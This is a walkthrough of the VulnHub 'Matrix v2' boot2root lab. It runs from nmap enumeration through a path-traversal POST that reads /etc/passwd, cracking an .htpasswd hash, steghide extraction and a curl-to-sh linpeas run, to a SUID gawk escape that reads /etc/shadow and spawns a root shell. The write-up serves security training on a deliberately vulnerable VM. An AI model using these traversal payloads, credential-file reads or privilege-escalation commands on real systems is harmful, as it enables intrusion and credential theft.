https://www.vulnhub.com/entry/matrix-2,279/
Description: Matrix v2.0 is a medium level boot2root challenge. The OVA has been tested on both VMware and Virtual Box.
Difficulty: Intermediate
Flags: Your Goal is to get root and read /root/flag.txt
Networking:
- DHCP: Enabled
- IP Address: Automatically assigned
Hint: Follow your intuitions ... and enumerate!
Run nmap -A scan against all TCP ports:
└─$ nmap -A -p- 192.168.5.106
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-21 22:21 EDT
Nmap scan report for 192.168.5.106
Host is up (0.0030s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Welcome in Matrix v2 Neo
1337/tcp open ssl/http nginx
|_http-title: 401 Authorization Required
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Not valid before: 2018-12-07T14:14:44
|_Not valid after: 2028-12-07T14:14:44
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Welcome to Matrix 2
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
12320/tcp open ssl/http ShellInABox
|_http-title: Shell In A Box
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Not valid before: 2018-12-07T14:14:44
|_Not valid after: 2028-12-07T14:14:44
12321/tcp open ssl/warehouse-sss?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Not valid before: 2018-12-07T14:14:44
|_Not valid after: 2028-12-07T14:14:44
12322/tcp open ssl/http nginx
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Not valid before: 2018-12-07T14:14:44
|_Not valid after: 2028-12-07T14:14:44
| tls-nextprotoneg:
|_ http/1.1
| http-robots.txt: 1 disallowed entry
|_file_view.php
|_http-title: Welcome in Matrix v2 Neo
Checking out http://192.168.5.106:12322/file_view.php returned a blank page. In the page source it shows
<!– Error file parameter missing..!!! -->
Using Burp Suite we can see that the header information is using a GET request instead of a POST.

*** Had trouble converting GET to a POST request using Burp Suite, not sure why but it wasn't changing it to POST so had to use curl instead.
Using curl lets us make a post request
└─$ curl -X POST -k https://192.168.5.106:12322/file_view.php -d "file=../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
...
n30:x:1000:1000:Neo,,,:/home/n30:/bin/bash
testuser:x:1001:1001::/home/testuser:
* Note users: testuser & n30
Login to ShellInABox with testuser:testuser @ https://192.168.5.106:12320/
Check web root directories for files:
└─$ ls -lah /usr/share/adminer/adminer/
total 28K
drwxr-xr-x 4 root root 4.0K Dec 14 2018 .
drwxr-xr-x 3 root root 4.0K Dec 8 2018 ..
drwxr-xr-x 2 root root 4.0K Dec 8 2018 css
-rw-r--r-- 1 root root 196 Dec 8 2018 file_view.php
-rw-r--r-- 1 root root 3.0K Dec 14 2018 index.php
drwxr-xr-x 2 root root 4.0K Dec 8 2018 js
-rw-r--r-- 1 root root 38 Dec 8 2018 robots.txt
└─$ ls -lah /var/www/
total 48K
drwxr-xr-x 4 root root 4.0K Dec 14 2018 .
drwxr-xr-x 12 root root 4.0K Dec 7 2018 ..
drwxr-xr-x 4 root root 4.0K Dec 14 2018 4cc3ss
-rw-r--r-- 1 root root 25K Dec 8 2018 h1dd3n.jpg
-rw-r--r-- 1 root root 3.6K Dec 14 2018 index.php
drwxr-xr-x 2 root root 4.0K Dec 8 2018 p4ss
Obtain Tr1n17y user password hash from .htpasswd file:
└─$ cat /var/www/p4ss/.htpasswd
Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0
Crack Tr1n17y password hash:
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --rules htpasswd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin (Tr1n17y)
1g 0:00:00:01 DONE (2024-07-14 21:42) 0.7407g/s 14791p/s 14791c/s 14791C/s checkmate..jaleesa
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Navigate to: https://192.168.5.106:1337/ – note n30 is in bright red font.. could this be a password?

Download hidden jpeg (noted from web root directory listing above): https://192.168.5.106:1337/h1dd3n.jpg
Install steghide on Kali and run it against hidden jpeg, using n30 as password:
└─$ sudo apt install steghide
└─$ steghide extract -sf h1dd3n.jpg
Enter passphrase: n30
wrote extracted data to "n30.txt".
└─$ cat n30.txt
P4$$w0rd
Login to ShellInABox with n30:P4$$w0rd @ https://192.168.5.106:12320/
Run Linpeas:
$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Of note in Linpeas output - morpheus SUID binary in /usr/bin:
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
You own the SUID file: /tmp/bash
-rwsr-xr-x 1 root root 11K Jan 22 2017 /usr/lib/authbind/helper
-rwsr-xr-x 1 root root 431K Aug 21 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 59K May 17 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 40K May 17 2017 /usr/bin/newgrp ---> HP-UX_10.20
-r-sr-x--- 1 root n30 647K Dec 8 2018 /usr/bin/morpheus (Unknown SUID binary!)
/usr/bin/morpheus appears to be the gawk binary:
n30@Matrix_2 ~$ /usr/bin/morpheus
Usage: morpheus [POSIX or GNU style options] -f progfile [--] file ...
Usage: morpheus [POSIX or GNU style options] [--] 'program' file ...
POSIX options: GNU long options: (standard)
...
To report bugs, see node `Bugs' in `gawk.info', which is
section `Reporting Problems and Bugs' in the printed version.
gawk is a pattern scanning and processing language.
By default it reads standard input and writes standard output.
Examples:
gawk '{ sum += $1 }; END { print sum }' file
gawk -F: '{ print $1 }' /etc/passwd
Use the gawk SUID escalation vector to read /etc/shadow, as shown in GTFO bins (https://gtfobins.github.io/gtfobins/gawk/)
n30@Matrix_2 ~$ LFILE=/etc/shadow
n30@Matrix_2 ~$ /usr/bin/morpheus '//' "$LFILE"
root:$6$d6i7/gdA$w/VkPrhMPBcRgaelZs0gwuugQ0M6MLxj8qSPjCv6zzdHIJwPmA1NKBn8LBHdRiGIjz3HyCFdVmD.nq0yJZvh90:17878:0:99999:7:::
...
Tried to crack this password hash with rockyou.txt but had no success
Use the gawk escalation vector to spawn a root shell, as shown in GTFO bins (https://gtfobins.github.io/gtfobins/gawk/):
n30@Matrix_2 ~$ /usr/bin/morpheus 'BEGIN {system("/bin/sh")}'
# id
uid=1000(n30) gid=1000(n30) euid=0(root) groups=1000(n30)
Cat the flag in /root:
# cat /root/flag.txt
╦ ╦┌─┐┬ ┬┬─┐┌─┐ ┌─┐┌─┐┌─┐┌┬┐┌─┐┬─┐ ┌┬┐┬ ┬┌─┐┌┐┌ ┌┬┐┬ ┬┬┌─┐
╚╦╝│ ││ │├┬┘├┤ ├┤ ├─┤└─┐ │ ├┤ ├┬┘ │ ├─┤├─┤│││ │ ├─┤│└─┐
╩ └─┘└─┘┴└─└─┘ └ ┴ ┴└─┘ ┴ └─┘┴└─ ┴ ┴ ┴┴ ┴┘└┘ ┴ ┴ ┴┴└─┘o
╔╦╗┌─┐┌┐┌┌┬┐ ┌┬┐┬ ┬┬┌┐┌┬┌─ ┬ ┬┌─┐┬ ┬ ┌─┐┬─┐┌─┐
║║│ ││││ │ │ ├─┤││││├┴┐ └┬┘│ ││ │ ├─┤├┬┘├┤
═╩╝└─┘┘└┘ ┴ ┴ ┴ ┴┴┘└┘┴ ┴ ┴ └─┘└─┘ ┴ ┴┴└─└─┘┘
┬┌─┌┐┌┌─┐┬ ┬ ┬ ┬┌─┐┬ ┬ ┌─┐┬─┐┌─┐
├┴┐││││ ││││ └┬┘│ ││ │ ├─┤├┬┘├┤
┴ ┴┘└┘└─┘└┴┘ ┴ └─┘└─┘ ┴ ┴┴└─└─┘o
╔╦╗┌─┐┬─┐┌─┐┬ ┬┌─┐┬ ┬┌─┐
───║║║│ │├┬┘├─┘├─┤├┤ │ │└─┐
╩ ╩└─┘┴└─┴ ┴ ┴└─┘└─┘└─┘
╔═╗╦╔═╔═╗
╠═╣╠╩╗╠═╣
╩ ╩╩ ╩╩ ╩
┬ ┬┌┐┌┬┌─┌┐┌┌─┐┬ ┬┌┐┌┌┬┐┌─┐┬ ┬┬┌─┐┌─┐
│ ││││├┴┐││││ │││││││ ││├┤ └┐┌┘││ ├┤ 64
└─┘┘└┘┴ ┴┘└┘└─┘└┴┘┘└┘─┴┘└─┘ └┘ ┴└─┘└─┘
Member discussion: